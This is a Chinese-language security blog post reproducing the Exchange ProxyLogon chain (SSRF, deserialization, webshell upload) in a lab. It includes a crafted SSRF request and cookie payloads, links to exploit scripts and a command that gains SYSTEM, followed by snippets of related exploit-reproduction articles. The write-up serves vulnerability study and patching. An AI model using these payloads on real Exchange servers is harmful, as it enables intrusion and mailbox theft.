Exchange SSRF+RCE漏洞復現

2022-01-25 上海矩安信息科技

0X00 簡介

Exchange Server是微軟公司的一套郵件服務組件,是個消息與協作系統,主要提供包括從電子郵件、會議安排、團體日程管理、任務管理、文檔管理、實時會議和工作流等協作應用。

0X01 漏洞概述

CVE-2021-26855該漏洞是Exchange中的服務端請求偽造漏洞(SSRF),利用此漏洞的攻擊者能夠發送任意HTTP請求並繞過Exchange Server身份驗證,遠程未授權的攻擊者可以利用該漏洞以進行內網探測,並可以用於竊取用戶郵箱的全部內容。

CVE-2021-26857是統一消息中的一個不安全的反序列化漏洞。不受信任的用戶可控數據被程序反序列的地方。利用此漏洞是HAFNIUM能夠在Exchange伺服器上以system身份運行代碼。

CVE-2021-27065是利用了Exchange伺服器不會對VirtualDirectory配置文件的文件後綴進行過濾,導致攻擊者可以通過惡意的URL在遠程伺服器上寫入Webshell並執行命令。

0X02 影響版本

0X03 環境搭建

1.在Windows server 2019上安裝AD域和DNS服務

2.安裝Exchange Server 2019

安裝.NET Framework 4.8

https://download.visualstudio.microsoft.com/download/pr/014120d7-d689-4305-befd-3cb711108212/0fd66638cde16859462a6243a4629a50/ndp48-x86-x64-allos-enu.exe

安裝Visual C++ 2013

https://support.microsoft.com/help/4032938/update-for-visual-c-2013-redistributable-package

安裝Unified Communications Managed API 4.0

https://www.microsoft.com/download/details.aspx?id=34992

以上軟體需安裝英文版

3.通過訪問https://localhost/ecp進入Exchange管理中心

實驗環境:關注公眾號上海矩安信息科技並回復CVE-2021-26855/27065/26857復現環境即可獲得

0X04 漏洞復現

一、利用CVE-2021-26855 SSRF

環境:

   本地伺服器:Windows Server 2019

   攻擊者:Kali

方法一:

1.訪問http://dnslog.cn/,點擊Get SubDomain獲取DNSLog地址。

訪問https://xx.xx.xx.xx/owa/auth/xxx.js(可以隨意構造)

2.構造cookie信息為:

X-AnonResource=true;X-AnonResource-Backend=DNSLOUG地址/ecp/default.flt?~3

3.如圖所示,可以返回連結地址,因此存在漏洞。

方法二:

1.通過Burp Suite工具的Repeater模塊對連結進行抓包,重新構造數據包。

POST /ecp/fewi.js HTTP/1.1 Host: mail.btwaf.cn User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Cookie: X-BEResource=WIN-OP1S9J0GMEV/autodiscover/autodiscover.xml?a=~1942062522; Content-Type: text/xml Content-Length: 407 
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>test@abc.com</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request> </Autodiscover>

2.更改用戶名和郵箱

二、利用CVE-2021-26857漏洞遠程執行命令

1.通過執行go腳本來獲取郵箱帳戶

go腳本地址:https://github.com/charlottelatest/CVE-2021-26855

2.執行EXP腳本獲取system權限,可以直接訪問網址,如報錯需修改腳本中的代理設置

EXP腳本地址:https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Exchange/CVE-2021-26855 Exchange RCE/exp.py

3.執行系統命令whoami,返回nt authority\system說明可以返回當前用戶,可以遠程執行命令

三、CVE-2021-27065上傳Webshell執行遠程代碼

1.下載proxylogon腳本:https://github.com/hausec/ProxyLogon

執行腳本:python proxylogon.py xx.xx.xx.xx administrator@abc.com

2.獲取到system權限,可以執行系統命令

3.可以看到Windows Server目錄下有上傳的文件,說明可以傳輸惡意文件

0X05 漏洞防禦

微軟官方已經發布了解決上述漏洞的安全更新,建議受影響用戶儘快升級到安全版本,官方安全版本下載可以參考以下連結:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855

由於傳播、利用此文所提供的信息而造成的任何直接或者間接的後果及損失,均由使用者本人負責,文章作者不為此承擔任何責任。上海矩安信息科技擁有對此文章的修改和解釋權。如需轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經上海矩安信息科技允許,不得任意修改或者增減此文章內容,不得以任何方式將其用於商業目的。



相關焦點

  • 【賊詳細 | 附PoC工具】Apache HTTPd最新RCE漏洞復現
    q=app%3A%22apache%20web%20server%202.4.49%202.4.50%220x06 漏洞復現:/blob/master/pocsuite3/pocs/20211008_web_apache-httpd_dir-traversal-rce_cve-2021-41773_cve-2021-42013.py說到這裡就簡要介紹一下個人感覺非常好用的一款神器pocsuite3    PocSuite3是Knownsec 404安全研究團隊設計的一款遠程漏洞測試以及
  • CVE-2021-26855:Exchange SSRF致RCE復現
    收錄於話題 #漏洞復現文章合集Microsoft Exchange 2016 (此次使用的是CU18版本)1、我使用的是windows server 2016,點擊管理>添加角色和功能嚮導,選擇Active Directory 域服務 和 DNS 伺服器3、點擊"將此伺服器提升為域控制器",這裡選擇添加新林,然後給自己主機定義一個內部域名,最好和外部域名稱不同。
  • Fastjson 1.2.47 RCE漏洞復現
    ,因為平時測試的時候,好像沒怎麼在意測試這個漏洞,復現過程中,漏洞環境挺好搭建的,只是在漏洞利用時,遇到了一些小問題,所以完整記錄下漏洞復現過程。0x 01環境搭建作業系統:ubuntu 18.04(fastjson漏洞環境) 、win10(ldap服務、Web服務)、vps(接收反彈shell)這裡環境搭建用的github上公開的vulhub(https://github.com/vulhub/vulhub),操作簡單好用,運行在docker中,非常方便。
  • Exchange CVE-2021-26855 RCE漏洞復現
    收錄於話題 #漏洞復現 感謝@saucer-man師傅的轉載允許原文出處:https://saucer-man.com/information_security/748
  • 通達OA 任意文件上傳+文件包含導致RCE漏洞復現
    該漏洞被黑產利用,用於投放勒索病毒。在繞過身份驗證的情況下通過文件上傳漏洞上傳惡意php文件,組合文件包含漏洞最終造成遠程代碼執行漏洞,從而導致可以控制伺服器system權限。0X01漏洞概述此漏洞是由未授權上傳和本地文件包含兩個漏洞組合而形成的rce漏洞文件上傳地址:http://localhost:801/ispirit/im/upload.php本地文件包含地址:http://localhost
  • spring boot (whitelabel error page SpEL RCE) 漏洞復現
    id=${7*7},如果發現報錯頁面將 7*7 的值 49 計算出來顯示在報錯頁面上,那麼基本可以確定目標存在 SpEL 表達式注入漏洞。漏洞環境:https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce環境搭建:下載上述漏洞環境項目地址,在本地使用IDEA打開該項目,
  • Joomla 3.4.6 遠程代碼執行漏洞復現
    收錄於話題 #漏洞復現文章合集0x01 漏洞概述Alessandro Groppo @Hacktive Security於2019-10-02在exploit-db( https://www.exploit-db.com/exploits/47465)發布了Joomla命令執行的EXP,漏洞本質是Joomla對session數據處理不當,未經授權的攻擊者可以發送精心構造的惡意
  • 超全面未授權訪問漏洞復現合集
    漏洞復現這裡遇到一個問題:部署的vnc環境,必須得設置密碼,VNC服務才能啟動。 但有密碼,就無法復現該漏洞(攻擊者無法獲取到密碼) 這裡可參考其他人發的,使用VNC Viewer 進行漏洞利用: 漏洞復現訪問http://192.168.131.128:8080/
  • 這次是真的復現,CVE-2020-13699(teamview rce)
    這次是真的復現!!!(*╹▽╹*),現在的年輕人怎麼都這麼暴躁,對著評論區就是一頓狂懟。
  • 漏洞復現之五: Fastjson<=1.2.24反序列化漏洞復現
    0x00 漏洞描述CVE-2017-18349,前臺無回顯RCE。
  • 詳細復現Microsoft Exchange Proxylogon漏洞利用鏈(CVE-2021-26855)
    這篇文章概述了我們的漏洞利用復現過程,其中隱去了關鍵的概念驗證組件,以防止有攻擊者根據這篇文章來進行漏洞武器化利用。儘管我們沒有發布完整的漏洞利用代碼,但是可以預測的是,安全社區很快就會有人發布完整的漏洞利用程序。在這部分內容被公開之後,我們也會隨即討論更為詳細的端到端解決方案。我們相信在未完整公開的這段時間,可以讓企業有更多時間來修復這一嚴重漏洞。
  • Apache Solr 漏洞復現
    影響版本5.0.0 到 8.3.1版本漏洞復現默認情況下params.resource.loader.enabled配置未打開,無法使用自定義模板。我們先通過如下API獲取所有的核心:http://127.0.0.1:8983/solr/admin/cores?
  • Exchange CVE-2021-26855 漏洞復現
    0x1 漏洞概述CVE-2021-26855 是Exchange中的服務端請求偽造漏洞(SSRF),利用此漏洞的攻擊者能夠發送任意HTTP請求並繞過
  • zimbra RCE復現與exp編寫
    別說了,直接乾貨開衝利用XXE+SSRF組合拳RCE復現第一步,測試是否存在CVE-2019-9670
  • Joomla 3.4.6-RCE漏洞復現
    0X1 漏洞概述Joomla是一套全球有名的CMS系統,基於PHP語言加上MySQL資料庫所開發出來的
  • ssrf漏洞的挖掘思路與技巧
    0X01   基礎的ssrf漏洞利用一些漏洞類型沒有直接表明攻擊是成功的。就如同此處的ssrf,,Payload觸發了卻不在前端頁面顯示。這時候使用CEYE平臺,通過使用諸如DNS和HTTP之類的帶外信道,便可以得到回顯信息。
  • Drupal 遠程代碼執行漏洞(CVE-2019-6339)復現
    漏洞概述Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的內置phar stream wrapper(PHP)存在遠程代碼執行漏洞。遠程攻擊者可利用該漏洞執行任意的php代碼。
  • CVE-2019-12384 Jackson遠程代碼執行復現
    漏洞版本:Jackson-databind 2.X < 2.9.9.1漏洞描述:由於Jackson黑名單過濾不完整而導致,當開發人員在應用程式中通過ObjectMapper對象調用enableDefaultTyping方法時,程序就會受到此漏洞的影響,攻擊者就可利用構造的包含有惡意代碼的json數據包對應用進行攻擊,直接獲取伺服器控制權限。
  • 腳本小子復現漏洞之CVE-2021-21972
    vSphere Client(HTML5)在 vCenter Server 插件中存在一個遠程執行代碼漏洞。
  • Laravel Debug mode RCE(CVE-2021-3129)漏洞復現
    這漏洞利用方法的核心是先利用編碼轉換清除內容,然後寫入惡意的數據。總是感覺在未來的CTF中會考到這個漏洞點,便自己復現了一下。我花了整整一天一夜的時間,終於將該漏洞復現成功了,中途出現了各種令我快吐了的Bug,幾近放棄。好在皇天不負有心人,我最終還是成功復現了該漏洞。